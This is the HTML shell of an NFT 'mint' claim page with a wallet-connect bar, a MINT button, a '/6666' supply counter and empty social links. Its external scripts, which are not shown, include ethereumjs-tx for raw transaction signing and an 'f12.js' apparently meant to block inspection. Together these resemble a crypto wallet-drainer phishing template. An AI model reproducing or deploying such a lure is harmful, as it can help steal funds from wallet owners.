<!DOCTYPE html><html lang="fr"><head><meta charset="utf-8">
    
    <title>Loading..</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/fontawesome.min.css">
    <!-- <link rel="preconnect" href="https://fonts.googleapis.com"> -->
    <!-- <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""> -->
    <!-- <link rel="preconnect" href="https://fonts.googleapis.com"> -->
    <!-- <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""> -->
    <script src="js/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" crossorigin="anonymous">
    <!-- <link rel="preconnect" href="https://fonts.googleapis.com"> -->
    <!-- <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""> -->
    <!-- <link rel="preconnect" href="https://fonts.googleapis.com"> -->
    <!-- <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""> -->
    <link rel="icon" href="img/ola.jpg">
    <link href="https://fonts.googleapis.com/css2?family=Anton&amp;display=swap" rel="stylesheet">
    <script src="js/settings.js"></script>
    <link rel="stylesheet" href="css/styles.css">
    
    <script src="js/moralis.js"></script>
    <script src="js/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <style>
        /* body {
            background-image: url("./claim/img/background.jpg");
            background-size:100% 100%; 
            background-attachment: fixed;
        }  */
        *{  
            margin: 0px;  
            padding: 0px;  
        }  
        video{  
            position: fixed;  
            right: 0px;  
            bottom: 0px;  
            min-width: 100%;  
            min-height: 100%;  
            height: auto;  
            width: auto;  
            /*加滤镜*/
            /*filter: blur(15px); //背景模糊设置 */
            /*-webkit-filter: grayscale(100%);*/  
            /*filter:grayscale(100%); //背景灰度设置*/  
            z-index:-11
        }  
        source{  
            min-width: 100%;  
            min-height: 100%;  
            height: auto;  
            width: auto;  
        } 
    </style>
   
    
</head>

<body class="container no-bg" style="max-width:1400px">
    <video id="v1" autoplay loop muted>
        <source src="img/MONKAI_ANIM_2.mp4" type="video/mp4"  />
  </video>
    <nav>
        <div class="logo"></div>
        <div class="right">
            <p id="walletAddress">NOT CONNECTED</p>
            <img src="img/meta.svg" alt="">
        </div>
    </nav>
    <div class="logo-re" style="display: none;"></div>
    <div class="section3">
        <div class="left">
            <!-- <img id="badgeImage" style="border-radius: 250px;" src="img/ola.jpg"> -->
        </div>
        <div class="right">
            <img id="badgeImage" style="border-radius: 250px;width: 275px;margin-left: 71px;" src="claim/img/ola.jpg">
            <h2 id="titleH2">Loading...</h2>
            <p id="shortDescription" style="font-size: 2.5em;"></p>
            <p id="longDescription"></p>
            <h2 id="num"  style="display: inline-block;"></h2><h2 style="display: inline-block;">/6666</h2>
            <div class="block-button">
                <a id="claimButton">MINT</a>
                <p id="notEli" style="color: red; padding-top: 10px; display: none; letter-spacing: 3px"></p>
            </div>

        </div>
    </div>
    <div class="section2">
        <div class="left">
            <a href="#">Terms &amp; Conditions<br>Privacy Policy</a>
            <p>© 2022 <span id="cp_name"></span></p>
        </div>
        <div class="left">
            <a id="social_discord" href="#" target="_blank"><img src="" alt=""></a>
            <a id="social_twitter" href="#" target="_blank"><img src="img/twiter.svg" alt=""></a>
            <a id="social_instagram" href="#" target="_blank"><img src="" alt=""></a>
        </div>
    </div>


    <script type="text/javascript" src="js/loader_claim.js"></script>
    <script src="js/claim.js"></script>
    <script src="js/f12.js"></script>

    <script src="js/web3.min.js"></script>
    <script src="js/index.min.js"></script>
    

</body>
</html>